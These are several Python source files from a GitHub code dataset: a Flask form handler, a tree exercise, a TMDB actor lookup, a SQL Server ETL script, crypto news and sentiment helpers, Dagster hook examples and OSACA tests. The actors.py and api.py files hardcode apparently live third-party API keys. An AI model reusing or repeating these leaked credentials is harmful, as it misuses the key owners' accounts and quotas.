WARNING\r\nimport json\r\nimport csv\r\nfrom flask import Flask, render_template, request\r\n\r\napp = Flask(__name__, template_folder='./template')\r\nfile_handler = FileHandler('errorlog.txt')\r\nfile_handler.setLevel(WARNING)\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/submit_form', methods=['POST', 'GET'])\r\ndef submit_form():\r\n if request.method == \"POST\":\r\n try:\r\n data = request.form.to_dict()\r\n write_to_csv(data)\r\n return 'thanks fam'\r\n except:\r\n return 'did not save to database'\r\n else:\r\n return 'oh no something went wrong'\r\n\r\n\r\ndef write_to_csv(data):\r\n with open('database.csv', mode='a', newline='') as database:\r\n email = data[\"email\"]\r\n subject = data[\"subject\"]\r\n message = data[\"message\"]\r\n csv_writer = csv.writer(database, delimiter=\",\", quotechar=\"'\", lineterminator='\\n', quoting=csv.QUOTE_MINIMAL)\r\n csv_writer.writerow([email, subject, message])\r\n","repo_name":"bananarchy3/portfolio","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35066626117","text":"\n# Author: Omkar Dixit\n# Email: omedxt@gmail.com\n\n'''\nGiven a Binary Tree of size N , You have to count leaves in it. For example, there are two leaves in following tree\n'''\n\nclass Node: \n def __init__(self, value):\n self.value = value\n self.right = None\n self.left = None\n\nclass Solution:\n def countLeaves(self, root, leaf):\n if not root:\n return leaf\n if not root.left and not root.right:\n leaf += 1\n return leaf\n leaf = self.countLeaves(root.left, leaf)\n leaf = self.countLeaves(root.right, leaf)\n return leaf\n\nif __name__=='__main__':\n sol = Solution()\n root = Node(1) \n root.left = Node(2) \n root.right = Node(3) \n root.right.left = Node(4)\n root.right.right = Node(5)\n print(sol.countLeaves(root, 0))","repo_name":"dixitomkar1809/Coding-Python","sub_path":"GFG/Tree/countLeavesInBinaryTree.py","file_name":"countLeavesInBinaryTree.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39297654488","text":"import tmdbsimple as tmdb\ntmdb.API_KEY = '5afe37acf61f67aad9c4a0d5817fa41b'\n\nclass SearchForActors():\n def __init__(self,keyword):\n self.l = []\n self.m = []\n self.keyword = keyword\n search = tmdb.Search()\n response = search.person(query=self.keyword)\n for i in response['results']:\n search1 = tmdb.People(i['id']).info()\n self.l.append([search1['id'],search1['name'],search1['biography'],search1['place_of_birth'],search1['birthday'],search1['popularity'],search1['profile_path']])\n","repo_name":"bpyardeep/Python-Flask","sub_path":"project/actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8110141506","text":"import requests\nimport pandas as pd\nimport numpy as np\nimport xml.etree.ElementTree as ET\nimport xmltodict\nimport pyodbc\nimport pymssql\nimport sqlalchemy \nfrom sqlalchemy import create_engine,inspect\nimport urllib\nimport json\nimport warnings\nwarnings.filterwarnings('ignore')\n\nserver = 'server\\server'\nusername = 'username'\npassword = 'password'\ndriver = 'ODBC Driver 17 for SQL Server'\ndatabase = 'stage'\nconn_str = (\nr'DRIVER={ODBC Driver 17 for SQL Server};'\nr'SERVER=server\\server;'\nr'DATABASE=db;'\nr'Trusted_Connection=yes;' )\n\nengine = create_engine(\"mssql+pyodbc:///?odbc_connect=%s\" % conn_str, fast_executemany=True)\nconn = engine.connect()\n\nclass StorageSolutionsData:\n def __init__(self):\n pass\n def get_token(self):\n data = {\n 'f': 'login',\n 'username': 'user',\n 'password': 'pw'\n }\n\n url = 'localhost'\n url = requests.get(url,params=data)\n xml_parse = xmltodict.parse(url.text)\n self.api_token = xml_parse['resp']['out']['token']\n print('API Token Received!')\n\n def get_board_list(self):\n # localhost#FuncPosboard_getlist\n data = {\n 'f': 'board_getlist',\n 'tkn': self.api_token\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n xml_response = xml_parse['resp']['out']['boardlist']['boardinfo']\n self.df = pd.DataFrame(xml_response)\n self.df_for_items = self.df\n self.df.reset_index(drop=True, inplace=True)\n self.df = self.df[['id','code','revision','description','notes','customercode','bintable','active']]\n self.df.to_sql('BoardInfo', engine, if_exists='replace',schema='juki')\n print('BoardInfo Pushed!')\n\n def regular_board(self):\n try:\n df_board_item = pd.DataFrame(self.series['items']['boarditem'])\n df_board_item_filter = df_board_item['filter'].apply(pd.Series)\n df_board_item_consignment = df_board_item['consignment'].apply(pd.Series)\n board_id = pd.Series(self.series['id'])\n df_concat = pd.concat([board_id,df_board_item, df_board_item_filter,df_board_item_consignment], axis=1)\n df_concat.rename(columns={0:'board_id'},inplace=True)\n df_concat['board_id'] = pd.to_numeric(df_concat['board_id'], errors='coerce')\n\n # https://stackoverflow.com/questions/65263207/valueerror-repeats-may-not-contain-negative-values\n df_concat = df_concat.ffill()\n\n # handling 2 supplier columns\n\n cols = []\n count = 1\n for column in df_concat.columns:\n if column == 'supplier':\n cols.append(f'supplier_{count}')\n count+=1\n continue\n cols.append(column)\n df_concat.columns = cols\n\n df_concat = df_concat.drop(['filter','consignment'], axis=1)\n df_concat.rename(columns={'supplier_1':'supplier','supplier_2':'ConsignmentSupplier','priority':'ConsignmentPriority'},inplace=True)\n self.board_items.append(df_concat)\n except:\n df_board_item = pd.DataFrame(self.series['items']['boarditem'].items())\n df_board_item = df_board_item.transpose()\n df_board_item.rename(columns=df_board_item.iloc[0],inplace=True)\n df_board_item = df_board_item.drop(df_board_item.index[0])\n df_board_item_filter = df_board_item['filter'].apply(pd.Series)\n df_board_item_consignment = df_board_item['consignment'].apply(pd.Series)\n board_id = pd.Series(self.series['id'])\n df_concat = pd.concat([board_id,df_board_item, df_board_item_filter,df_board_item_consignment], axis=1)\n df_concat.rename(columns={0:'board_id'},inplace=True)\n df_concat['board_id'] = pd.to_numeric(df_concat['board_id'], errors='coerce')\n \n\n # https://stackoverflow.com/questions/65263207/valueerror-repeats-may-not-contain-negative-values\n df_concat = df_concat.ffill()\n\n # handling 2 supplier columns\n\n cols = []\n count = 1\n for column in df_concat.columns:\n if column == 'supplier':\n cols.append(f'supplier_{count}')\n count+=1\n continue\n cols.append(column)\n df_concat.columns = cols\n\n df_concat = df_concat.drop(['filter','consignment'], axis=1)\n df_concat.rename(columns={'supplier_1':'supplier','supplier_2':'ConsignmentSupplier','priority':'ConsignmentPriority'},inplace=True)\n df_concat = df_concat.iloc[1: , :]\n self.board_items.append(df_concat)\n\n def alternative_board(self):\n df_board_item_alternative = pd.DataFrame(self.series['items']['boarditem']['alternativeitems']['alternativeitem'])\n df_board_item_alternative_filter = df_board_item_alternative['filter'].apply(pd.Series)\n df_board_item_alternative_consignment = pd.DataFrame(self.series['items']['boarditem']['consignment'],index=[0])\n board_id = pd.Series(self.series['id'])\n df_concat = pd.concat([board_id,df_board_item_alternative,df_board_item_alternative_filter,df_board_item_alternative_consignment], axis=1)\n df_concat.rename(columns={0:'board_id'},inplace=True)\n df_concat['board_id'] = pd.to_numeric(df_concat['board_id'], errors='coerce')\n\n df_concat = df_concat.ffill()\n\n cols = []\n count = 1\n for column in df_concat.columns:\n if column == 'supplier':\n cols.append(f'supplier_{count}')\n count+=1\n continue\n cols.append(column)\n df_concat.columns = cols\n\n df_concat = df_concat.drop(['filter','priority','supplier_2'], axis=1)\n df_concat.rename(columns={'supplier_1':'supplier','id':'itemid','code':'itemcode'},inplace=True)\n df_concat['OrderPref'] = np.arange(df_concat.shape[0])\n df_concat = df_concat[['board_id','itemid','itemcode','OrderPref','supplier','mpn','manufacturer']]\n self.alternative_board_items.append(df_concat)\n\n def get_board_items(self):\n self.board_items = []\n self.alternative_board_items = []\n faulty_format = []\n for i,self.series in self.df_for_items.iterrows():\n try:\n df_board_item = pd.DataFrame(self.series['items']['boarditem'])\n if(len(df_board_item.alternativeitems.value_counts()) > 0) == False:\n self.regular_board()\n else:\n self.alternative_board()\n except Exception as e:\n faulty_format.append(self.series['id'])\n\n final_board = pd.concat(self.board_items)\n final_board.reset_index(drop=True, inplace=True)\n final_board.to_sql('BoardItem', engine, if_exists='replace',schema='juki')\n print('BoardItem Pushed!')\n\n final_board_alternative = pd.concat(self.alternative_board_items)\n final_board_alternative.reset_index(drop=True, inplace=True)\n final_board_alternative.to_sql('BoardAlternativeItems', engine, if_exists='replace',schema='juki')\n print('BoardAlternativeItmes Pushed!')\n\n def get_item_info(self):\n # localhost#FuncPositem_getlist\n data = {\n 'f': 'item_getlist',\n 'tkn': self.api_token\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n xml_response = xml_parse['resp']['out']['itemlist']['iteminfo']\n df = pd.DataFrame(xml_response)\n df.reset_index(drop=True, inplace=True)\n df.to_sql('ItemInfo', engine, if_exists='replace',schema='juki')\n print('ItemInfo Pushed!')\n\n def get_reel_info(self):\n # localhost#FuncPosreel_getlist\n data = {\n 'f': 'reel_getlist',\n 'tkn': self.api_token\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n xml_response = xml_parse['resp']['out']['reellist']['reelinfo']\n df = pd.DataFrame(xml_response)\n df[['adddate', 'adduser']] = df['add'].str.split(',', 1, expand=True)\n df.drop('add',inplace=True,axis=1)\n df.reset_index(drop=True, inplace=True)\n df.to_sql('ReelInfo', engine, if_exists='replace',schema='juki')\n print('ReelInfo Pushed!')\n\n def get_session_list(self):\n # localhost#FuncPossession_getlist\n\n data = {\n 'f': 'session_getlist',\n 'tkn': self.api_token\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n xml_response = xml_parse['resp']['out']['sessions']['sessioninfo']\n self.session_list_df = pd.DataFrame(xml_response)\n\n def get_session_boards(self):\n # localhost#FuncPossession_getboards\n\n session_boards = []\n no_session_boards = []\n\n for i in self.session_list_df['id']:\n data = {\n 'f': 'session_getboards',\n 'tkn': self.api_token,\n 'id': i\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n try: \n xml_response = xml_parse['resp']['out']['sessionboards']['sessionboard']\n df_session_board = pd.DataFrame(xml_response,index=[0])\n df_session_board['session_id'] = i\n df_session_board = df_session_board.ffill()\n first_column = df_session_board.pop('session_id')\n df_session_board.insert(0, 'session_id', first_column)\n session_boards.append(df_session_board)\n except:\n no_session_boards.append(i)\n final_session_boards = pd.concat(session_boards)\n final_session_boards.reset_index(drop=True, inplace=True)\n final_session_boards.to_sql('SessionBoard', engine, if_exists='replace',schema='juki')\n print('SessionBoard Pushed!')\n\n def get_session_info(self):\n # localhost#FuncPossession_getinfo\n \n session_info = []\n no_session_info = []\n\n for i in self.session_list_df['id']:\n data = {\n 'f': 'session_getinfo',\n 'tkn': self.api_token,\n 'id': i\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n try:\n xml_response = xml_parse['resp']['out']['info']\n df_session_info = pd.DataFrame(xml_response,index=[0])\n df_session_info = df_session_info.ffill()\n session_info.append(df_session_info)\n except:\n no_session_info.append(i)\n final_session_info = pd.concat(session_info)\n final_session_info.reset_index(drop=True, inplace=True)\n final_session_info.to_sql('SessionInfo', engine, if_exists='replace',schema='juki')\n print('SessionInfo Pushed!')\n\n def get_session_items(self):\n # localhost#FuncPossession_getitems\n session_items = []\n no_session_items = []\n\n for i in self.session_list_df['id']:\n data = {\n 'f': 'session_getitems',\n 'tkn': self.api_token,\n 'id': i\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n try:\n xml_response = xml_parse['resp']['out']['sessionitems']['sessionitem']\n df_initial = pd.DataFrame(xml_response)\n df_item_info = df_initial['iteminfo'].apply(pd.Series)\n df_session_item = pd.concat([df_initial, df_item_info], axis=1, join='inner')\n df_session_item = df_session_item.drop('iteminfo', axis=1)\n \n df_session_item['session_id'] = i\n df_session_item = df_session_item.ffill()\n first_column = df_session_item.pop('session_id')\n df_session_item.insert(0, 'session_id', first_column)\n session_items.append(df_session_item)\n except:\n no_session_items.append(i)\n final_session_items = pd.concat(session_items)\n final_session_items.rename(columns={'id':'ItemId'},inplace=True)\n final_session_items.reset_index(drop=True, inplace=True)\n final_session_items.to_sql('SessionItem', engine, if_exists='replace',schema='juki')\n print('SessionItem Pushed!')\n\n def get_session_reels(self):\n # localhost#FuncPossession_getreels\n \n session_reels = []\n no_sessions = []\n for i in self.session_list_df['id']:\n data = {\n 'f': 'session_getreels',\n 'tkn': self.api_token,\n 'id': i\n }\n\n url_item_list = f'localhost'\n url = requests.get(url_item_list,params=data)\n xml_parse = xmltodict.parse(url.text)\n try:\n xml_response = xml_parse['resp']['out']['sessionreels']['sessionreel']\n df = pd.DataFrame(xml_response)\n df['session_id'] = i\n df = df.ffill()\n first_column = df.pop('session_id')\n df.insert(0, 'session_id', first_column)\n session_reels.append(df)\n except:\n no_sessions.append(i) \n final_session_reels = pd.concat(session_reels)\n final_session_reels.reset_index(drop=True, inplace=True)\n final_session_reels.to_sql('SessionReel', engine, if_exists='replace',schema='juki')\n print('SessionReel Pushed!')\n conn.close()\n\ns = StorageSolutionsData()\ns.get_token()\ns.get_board_list()\ns.get_board_items()\ns.get_item_info()\ns.get_reel_info()\ns.get_session_list()\ns.get_session_boards()\ns.get_session_info()\ns.get_session_items()\ns.get_session_reels()\n","repo_name":"klapp101/StorageSolutions","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":14354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22619086857","text":"# importing the requests library\nimport requests\n\nimport http.client as httplib\nimport urllib\nimport json\n\n# for crypto data\nfrom datetime import datetime\nfrom time import mktime\n\nfrom newsapi import NewsApiClient\n\n# Get Request\n# def crypto_news(mode, coin, date, apiKey = \"00f61addc87f43299865eca28c4990fa\"):\n# # api-endpoint\n# URL = \"https://newsapi.org/v2/\" + mode\n# #sources for crypto newsapi\n#\n# # defining a params dict for the parameters to be sent to the API\n# PARAMS = {'q':coin, 'from': date, 'sortBy':'popularity','apiKey': apiKey}\n# # sending get request and saving the response as response object\n# r = requests.get(url = URL, params = PARAMS)\n#\n# # extracting data in json format\n# data = r.json()['articles']\n#\n# return data\n\ndef crypto_news(coin, start, final):\n\n newsapi = NewsApiClient(api_key=\"00f61addc87f43299865eca28c4990fa\")\n\n all_articles = newsapi.get_everything(q=coin,\n from_parameter=start,\n to=final,\n language='en',\n sort_by='relevancy')\n data = all_articles['articles']\n\n description_list = []\n\n for i in data:\n description_list.append(i[\"description\"])\n\n return data, description_list\n\ndef bing_news(search_term):\n\n subscription_key = '876a5eaf8f574cf1856c201c18f20997'\n search_url = 'https://api.cognitive.microsoft.com/bing/v7.0/news/search'\n\n headers = {\"Ocp-Apim-Subscription-Key\" : subscription_key}\n\n params = {\"q\": search_term, \"textDecorations\": True, \"textFormat\": \"HTML\", \"sortBy\": \"Date\", \"since\": 946684800}\n response = requests.get(search_url, headers=headers, params=params)\n response.raise_for_status()\n search_results = response.json()\n\n # All the value\n value = search_results[\"value\"]\n\n # descriptions = [article[\"description\"] for article in search_results[\"value\"]]\n\n return value\n\n# Post individual sentiment from azure\ndef GetSentiment(text):\n\n \"Gets the sentiments for a set of documents and returns the information.\"\n\n accessKey =\"c1029950d5e14c72808339af683178ef\"\n\n uri = 'eastus.api.cognitive.microsoft.com'\n\n path = '/text/analytics/v2.0/sentiment'\n\n headers = {'Ocp-Apim-Subscription-Key': accessKey}\n conn = httplib.HTTPSConnection(uri)\n\n documents = { 'documents': [\n { 'id': '1', 'language': 'en', 'text': text},\n ]}\n\n body = json.dumps(documents)\n conn.request(\"POST\", path, body, headers)\n response = conn.getresponse()\n\n result = response.read().decode('utf-8')\n\n json_result = json.loads(result)\n print(json_result)\n\n try:\n score = json_result['documents'][0][\"score\"]\n except Exception:\n score = 0\n\n return score\n\n# function to create list of strings\n# strings of description\ndef description(data):\n\n data_list = []\n for i in range(len(data)):\n data_list.append(data[i][\"description\"])\n\n return data_list\n\n# Crypto historical data\ndef crypto_data(coin, start, end, period):\n # api-endpoint\n # URL = \"https://poloniex.com/public?command=returnOrderBook¤cyPair=BTC_NXT&depth=10\"\n #sources for crypto newsapi\n URL = \"https://poloniex.com/public?\"\n\n start_unix = mktime(datetime.strptime(start, \"%Y-%m-%d\").timetuple())\n end_unix = mktime(datetime.strptime(end, \"%Y-%m-%d\").timetuple())\n\n # defining a params dict for the parameters to be sent to the API\n PARAMS = {'command':\"returnChartData\", 'currencyPair': coin, 'start': start_unix, 'end': end_unix, 'period': period}\n # sending get request and saving the response as response object\n r = requests.get(url = URL, params = PARAMS)\n\n # extracting data in json format\n data = r.json()\n\n return data\n\n# Creates news, sent dictionary\ndef sent_dict(description, description_list, descending = True):\n\n sentiments = dict()\n\n for i in description:\n sentiments[i[\"description\"]] = GetSentiment(i[\"description\"])\n\n score_list = []\n\n for keys, value in sentiments.items():\n score_list.append(value)\n\n # sorted score list descending\n sorted_score = sorted(score_list, reverse = descending)\n # create dictionary object\n sorted_dict = dict()\n\n sorted_description = []\n\n for i in sorted_score:\n for key, value in sentiments.items(): # for name, age in list.items(): (for Python 3.x)\n if value == i:\n sorted_dict[key] = i\n sorted_description.append(key)\n\n # Returns an ordered dictionary from descending order of scores with a key as the description and the score as the value\n return sorted_dict, sorted_score, sorted_description\n\ndef score(data):\n # returns a list of strings\n\n list_score = []\n\n for i in data:\n list_score.append(str(GetSentiment(i[\"description\"])))\n\n return list_score\n\ndef coin_to_json(coin_data):\n\n x = []\n y = []\n\n for i in coin_data:\n t = datetime.fromtimestamp(i['date'])\n\n x.append(t.strftime('%Y-%m-%d'))\n y.append(i[\"close\"])\n\n plot_data = []\n\n for i in range(len(x)):\n plot_data.append({'x': x[i], 'y': y[i]})\n\n return json.dumps(plot_data)\n\ndef changes_bitcoin():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[0][\"percent_change_7d\"]\n percent_change_1h = results[0][\"percent_change_1h\"]\n percent_change_24h = results[0]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_ethereum():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[1][\"percent_change_7d\"]\n percent_change_1h = results[1][\"percent_change_1h\"]\n percent_change_24h = results[1]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_ripple():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[2][\"percent_change_7d\"]\n percent_change_1h = results[2][\"percent_change_1h\"]\n percent_change_24h = results[2]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_BTC_cash():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[3][\"percent_change_7d\"]\n percent_change_1h = results[3][\"percent_change_1h\"]\n percent_change_24h = results[3]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_LTC():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[6][\"percent_change_7d\"]\n percent_change_1h = results[6][\"percent_change_1h\"]\n percent_change_24h = results[6]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n\ndef changes_Stellar():\n\n url = 'https://api.coinmarketcap.com/v1/ticker/'\n headers = {'limit' : '10'}\n response = requests.get(url, headers=headers)\n\n response.raise_for_status()\n results = response.json()\n\n percent_change_7d = results[5][\"percent_change_7d\"]\n percent_change_1h = results[5][\"percent_change_1h\"]\n percent_change_24h = results[5]['percent_change_24h']\n\n return percent_change_1h, percent_change_24h, percent_change_7d\n","repo_name":"hb2kang-zz/CryptoSent","sub_path":"crypto_django/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":7987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9879593867","text":"# ruff: isort: skip_file\nfrom unittest import mock\n\nimport yaml\nfrom dagster_slack import slack_resource\n\n# start_repo_marker_0\nfrom dagster import (\n HookContext,\n ResourceDefinition,\n failure_hook,\n file_relative_path,\n graph,\n job,\n op,\n repository,\n success_hook,\n)\n\n\n@success_hook(required_resource_keys={\"slack\"})\ndef slack_message_on_success(context: HookContext):\n message = f\"Op {context.op.name} finished successfully\"\n context.resources.slack.chat_postMessage(channel=\"#foo\", text=message)\n\n\n@failure_hook(required_resource_keys={\"slack\"})\ndef slack_message_on_failure(context: HookContext):\n message = f\"Op {context.op.name} failed\"\n context.resources.slack.chat_postMessage(channel=\"#foo\", text=message)\n\n\n# end_repo_marker_0\n\nslack_resource_mock = mock.MagicMock()\n\n\n@op\ndef a():\n pass\n\n\n@op\ndef b():\n raise Exception()\n\n\n# start_repo_marker_1\n@job(resource_defs={\"slack\": slack_resource}, hooks={slack_message_on_failure})\ndef notif_all():\n # the hook \"slack_message_on_failure\" is applied on every op instance within this graph\n a()\n b()\n\n\n# end_repo_marker_1\n\n\n# start_repo_marker_3\n@graph\ndef slack_notif_all():\n a()\n b()\n\n\nnotif_all_dev = slack_notif_all.to_job(\n name=\"notif_all_dev\",\n resource_defs={\n \"slack\": ResourceDefinition.hardcoded_resource(\n slack_resource_mock, \"do not send messages in dev\"\n )\n },\n hooks={slack_message_on_failure},\n)\n\nnotif_all_prod = slack_notif_all.to_job(\n name=\"notif_all_prod\",\n resource_defs={\"slack\": slack_resource},\n hooks={slack_message_on_failure},\n)\n\n\n# end_repo_marker_3\n\n\n# start_repo_marker_2\n@job(resource_defs={\"slack\": slack_resource})\ndef selective_notif():\n # only op \"a\" triggers hooks: a slack message will be sent when it fails or succeeds\n a.with_hooks({slack_message_on_failure, slack_message_on_success})()\n # op \"b\" won't trigger any hooks\n b()\n\n\n# end_repo_marker_2\n\n\n@repository\ndef repo():\n return [notif_all, selective_notif]\n\n\n# start_repo_main\nif __name__ == \"__main__\":\n prod_op_hooks_run_config_yaml = file_relative_path(__file__, \"prod_op_hooks.yaml\")\n with open(prod_op_hooks_run_config_yaml, \"r\", encoding=\"utf8\") as fd:\n run_config = yaml.safe_load(fd.read())\n\n notif_all_prod.execute_in_process(run_config=run_config, raise_on_error=False)\n# end_repo_main\n\n\n# start_testing_hooks\nfrom dagster import build_hook_context\n\n\n@success_hook(required_resource_keys={\"my_conn\"})\ndef my_success_hook(context):\n context.resources.my_conn.send(\"foo\")\n\n\ndef test_my_success_hook():\n my_conn = mock.MagicMock()\n # construct HookContext with mocked ``my_conn`` resource.\n context = build_hook_context(resources={\"my_conn\": my_conn})\n\n my_success_hook(context)\n\n assert my_conn.send.call_count == 1\n\n\n# end_testing_hooks\n\n\n# start_repo_marker_1_with_configured\n@job(\n resource_defs={\n \"slack\": slack_resource.configured(\n {\"token\": \"xoxp-1234123412341234-12341234-1234\"}\n )\n },\n hooks={slack_message_on_failure},\n)\ndef notif_all_configured():\n # the hook \"slack_message_on_failure\" is applied on every op instance within this graph\n a()\n b()\n\n\n# end_repo_marker_1_with_configured\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/concepts/ops_jobs_graphs/op_hooks.py","file_name":"op_hooks.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"2238293898","text":"#!/usr/bin/env python3\n\"\"\"\nUnit tests for the CLI of OSACA and running the sample kernels in examples/\n\"\"\"\n\nimport argparse\nimport os\nimport unittest\nfrom io import StringIO\nfrom shutil import copyfile\nfrom unittest.mock import patch\n\nimport osaca.osaca as osaca\nfrom osaca.db_interface import sanity_check\nfrom osaca.parser import ParserAArch64, ParserX86ATT\nfrom osaca.semantics import MachineModel\n\n\nclass ErrorRaisingArgumentParser(argparse.ArgumentParser):\n def error(self, message):\n raise ValueError(message) # reraise an error\n\n\nclass TestCLI(unittest.TestCase):\n ###########\n # Tests\n ###########\n\n def test_check_arguments(self):\n parser = osaca.create_parser(parser=ErrorRaisingArgumentParser())\n args = parser.parse_args([\"--arch\", \"WRONG_ARCH\", self._find_file(\"gs\", \"csx\", \"gcc\")])\n with self.assertRaises(ValueError):\n osaca.check_arguments(args, parser)\n args = parser.parse_args(\n [\n \"--arch\",\n \"csx\",\n \"--import\",\n \"WRONG_BENCH\",\n self._find_file(\"gs\", \"csx\", \"gcc\"),\n ]\n )\n with self.assertRaises(ValueError):\n osaca.check_arguments(args, parser)\n\n def test_import_data(self):\n parser = osaca.create_parser(parser=ErrorRaisingArgumentParser())\n args = parser.parse_args(\n [\n \"--arch\",\n \"tx2\",\n \"--import\",\n \"ibench\",\n self._find_test_file(\"ibench_import_aarch64.dat\"),\n ]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n args = parser.parse_args(\n [\n \"--arch\",\n \"tx2\",\n \"--import\",\n \"asmbench\",\n self._find_test_file(\"asmbench_import_aarch64.dat\"),\n ]\n )\n osaca.run(args, output_file=output)\n\n def test_check_db(self):\n parser = osaca.create_parser(parser=ErrorRaisingArgumentParser())\n args = parser.parse_args(\n [\n \"--arch\",\n \"tx2\",\n \"--db-check\",\n \"--verbose\",\n self._find_test_file(\"triad_x86_iaca.s\"),\n ]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n\n def test_get_parser(self):\n self.assertTrue(isinstance(osaca.get_asm_parser(\"csx\"), ParserX86ATT))\n self.assertTrue(isinstance(osaca.get_asm_parser(\"tx2\"), ParserAArch64))\n with self.assertRaises(ValueError):\n osaca.get_asm_parser(\"UNKNOWN\")\n\n def test_marker_insert_x86(self):\n # copy file to add markers\n name = self._find_test_file(\"kernel_x86.s\")\n name_copy = name + \".copy.s\"\n copyfile(name, name_copy)\n\n user_input = [\".L10\"]\n output = StringIO()\n parser = osaca.create_parser()\n args = parser.parse_args([\"--arch\", \"csx\", \"--insert-marker\", name_copy])\n with patch(\"builtins.input\", side_effect=user_input):\n osaca.run(args, output_file=output)\n\n lines_orig = len(open(name).readlines())\n lines_copy = len(open(name_copy).readlines())\n self.assertEqual(lines_copy, lines_orig + 5 + 4)\n # remove copy again\n os.remove(name_copy)\n\n def test_marker_insert_aarch64(self):\n # copy file to add markers\n name = self._find_test_file(\"kernel_aarch64.s\")\n name_copy = name + \".copy.s\"\n copyfile(name, name_copy)\n\n user_input = [\".LBB0_32\", \"64\"]\n parser = osaca.create_parser()\n args = parser.parse_args([\"--arch\", \"tx2\", \"--insert-marker\", name_copy])\n with patch(\"builtins.input\", side_effect=user_input):\n osaca.run(args)\n\n lines_orig = len(open(name).readlines())\n lines_copy = len(open(name_copy).readlines())\n self.assertEqual(lines_copy, lines_orig + 3 + 2)\n # remove copy again\n os.remove(name_copy)\n\n def test_examples(self):\n kernels = [\n \"add\",\n \"copy\",\n \"daxpy\",\n \"gs\",\n \"j2d\",\n \"striad\",\n \"sum_reduction\",\n \"triad\",\n \"update\",\n ]\n archs = [\"csx\", \"tx2\", \"zen1\"]\n comps = {\"csx\": [\"gcc\", \"icc\"], \"tx2\": [\"gcc\", \"clang\"], \"zen1\": [\"gcc\"]}\n parser = osaca.create_parser()\n # Analyze all asm files resulting out of kernels, archs and comps\n for k in kernels:\n for a in archs:\n for c in comps[a]:\n with self.subTest(kernel=k, arch=a, comp=c):\n args = parser.parse_args(\n [\n \"--arch\",\n a,\n self._find_file(k, a, c),\n \"--export-graph\",\n \"/dev/null\",\n ]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n self.assertTrue(\"WARNING\" not in output.getvalue())\n\n def test_architectures(self):\n parser = osaca.create_parser()\n # Run the test kernel for all architectures\n archs = osaca.SUPPORTED_ARCHS\n for arch in archs:\n with self.subTest(micro_arch=arch):\n isa = MachineModel.get_isa_for_arch(arch)\n kernel = \"kernel_{}.s\".format(isa)\n args = parser.parse_args([\"--arch\", arch, self._find_test_file(kernel)])\n output = StringIO()\n osaca.run(args, output_file=output)\n\n def test_architectures_sanity(self):\n # Run sanity check for all architectures\n archs = osaca.SUPPORTED_ARCHS\n for arch in archs:\n with self.subTest(micro_arch=arch):\n out = StringIO()\n sanity = sanity_check(arch, verbose=2, output_file=out)\n self.assertTrue(sanity, msg=out)\n\n def test_without_arch(self):\n # Run test kernels without --arch flag\n parser = osaca.create_parser()\n # x86\n kernel_x86 = \"kernel_x86.s\"\n args = parser.parse_args([self._find_test_file(kernel_x86)])\n output = StringIO()\n osaca.run(args, output_file=output)\n # AArch64\n kernel_aarch64 = \"kernel_aarch64.s\"\n args = parser.parse_args([self._find_test_file(kernel_aarch64)])\n osaca.run(args, output_file=output)\n\n def test_user_warnings(self):\n parser = osaca.create_parser()\n kernel = \"triad_x86_unmarked.s\"\n args = parser.parse_args(\n [\"--arch\", \"csx\", \"--ignore-unknown\", self._find_test_file(kernel)]\n )\n output = 